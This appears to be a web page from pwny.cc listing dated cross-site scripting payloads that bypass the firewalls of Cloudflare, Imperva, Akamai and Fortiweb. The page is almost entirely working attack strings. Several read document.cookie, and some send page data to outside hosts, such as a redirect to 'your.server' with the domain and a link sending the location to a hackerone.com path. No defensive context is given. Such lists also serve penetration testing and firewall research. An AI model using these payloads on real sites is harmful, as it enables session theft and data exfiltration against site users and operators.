pwny.cc
WAF Bypasses
Each payload is preceded by the date on which the bypass was discovered.

Cloudflare

//29-11-2021:
<img/src=x onError="`${x}`;alert(`XSS`);">

//26-11-2021:
-top['al\x65rt']('xss')-

//24-10-2021:
<svg onload=alert&#0000000040document.cookie)>

//06-10-2021:
";(a=alert,b=1,a(b))

//17-08-2021:
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"

//04-08-2021:
%27%09);%0d%0a%09%09[1].find(alert)//

//22-05-2021:
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

//12-04-2021:
<svg/onload=location/**/='https://your.server/'+document.domain>

//25-02-2021:
<svg onx=() onload=(confirm)(1)>

//25-01-2021:
<svg/onrandom=random onload=confirm(1)>

//11-01-2021:
<svg onload=alert%26%230000000040"1")>

//23-12-2020:
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>

Imperva

//24-02-2021:
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

Akamai

//28-09-2021:
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click

//13-12-2020:
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

//28-10-2018:
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

Fortiweb

//09-07-2019:
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e